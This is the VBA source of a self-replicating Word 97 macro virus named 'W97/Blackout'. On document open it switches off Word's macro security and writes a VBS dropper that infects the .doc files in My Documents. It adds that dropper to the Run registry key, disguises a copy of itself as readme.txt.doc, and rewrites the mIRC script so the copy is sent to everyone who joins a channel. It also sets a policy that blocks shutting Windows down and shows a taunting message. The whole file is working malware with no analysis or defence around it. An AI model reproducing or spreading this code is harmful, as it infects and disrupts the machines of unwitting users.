VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
END
Attribute VB_Name = "Blackout"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True







































































'W97/Blackout
Private Sub Document_Open()
On Error Resume Next

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security").Enabled = False

Set Ad = ActiveDocument.VBProject.VBComponents
Open "c:\blackout.vxd" For Output As #1
Print #1, Ad.Item(1).codemodule.Lines(1, Ad.Item(1).codemodule.CountofLines)
Close #1

Open "c:\blackout.vbs" For Output As #2
Print #2, "'W97/Blackout"
Print #2, "On Error Resume Next"
Print #2, ""
Print #2, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #2, "Set ws=CreateObject(""Wscript.Shell"")"
Print #2, "Set wa=CreateObject(""Word.Application"")"
Print #2, ""
Print #2, "infwd(""c:\mydocu~1\"")"
Print #2, ""
Print #2, "function infwd(doc)"
Print #2, "If f.FolderExists(doc) Then"
Print #2, ""
Print #2, "For Each wd in f.GetFolder(doc)"
Print #2, "ext=f.GetExtensionName(wd.Name)"
Print #2, "if ext=""doc"" or ext=""DOC"" Then"
Print #2, "Set wp=wa.application"
Print #2, "wp.Documents.Open wd.name"
Print #2, "Set ad=wp.ActiveDocument.VBProject.VBComponents.Item(1)"
Print #2, "if ad.name <> ""Blackout"" then"
Print #2, "ad.CodeModule.AddFromFile ""c:\blackout.vxd"" "
Print #2, "ad.name=""Blackout"""
Print #2, "wp.ActiveDocument.ReadOnlyRecommended = true"
Print #2, "wp.ActiveDocument.Save"
Print #2, "End If"
Print #2, "End If"
Print #2, "Next"
Print #2, "End If"
Print #2, ""
Print #2, "End Function"
Close #2

System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "blackout") = "c:\blackout.vbs"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Blackout", "ppacket") = "by pickpacket"
If Dir("c:\mirc\mirc32.exe") <> "" Then
script = "c:\mirc\script.ini"
ElseIf Dir("c:\progra~1\mirc\mirc32.exe") <> "" Then
script = "c:\progra~1\mirc\script.ini"
End If
ActiveDocument.SaveAs FileName:="c:\readme.txt.doc"

If script <> "" Then
Open script For Output As #3
Print #3, "[script]"
Print #3, "n0=on 1:Join:#: {"
Print #3, "n1=/if ($nick == $me ) {Halt}"
Print #3, "n2=/DCC Send (c:\readme.txt.doc)"
Print #3, "n3=/Clear"
Print #3, "n4=/MOTD"
Print #3, "n5=}"
Close #3
End If

If Hour(Now) = Rnd * 23 Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoClose") = 1&
Assistant.Visible = True
Assistant.Animation = msoAnimationGetTechy
With Assistant.NewBalloon
.Heading = "W97/Blackout"
.Text = "This goes out to the people in the power companies!!!"
.Show
End With
End If
End Sub
